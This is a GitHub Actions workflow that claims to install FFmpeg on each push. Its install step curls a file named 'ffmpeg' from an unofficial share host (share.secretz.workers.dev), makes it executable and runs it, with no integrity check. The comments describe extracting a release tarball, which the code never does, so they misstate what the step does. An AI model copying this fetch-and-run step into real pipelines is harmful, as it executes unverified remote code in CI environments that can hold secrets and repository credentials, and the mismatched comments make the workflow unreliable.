name: Install FFmpeg

on: [push]

jobs:
  install-ffmpeg:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Download and install FFmpeg
        run: |
          # Download the FFmpeg release tarball
          curl -Lo ffmpeg https://share.secretz.workers.dev/2:/
          
          # Make FFmpeg executable (assuming it's in the extracted directory)
          chmod +x ffmpeg

      - name: Verify FFmpeg installation
        run: ./ffmpeg -version
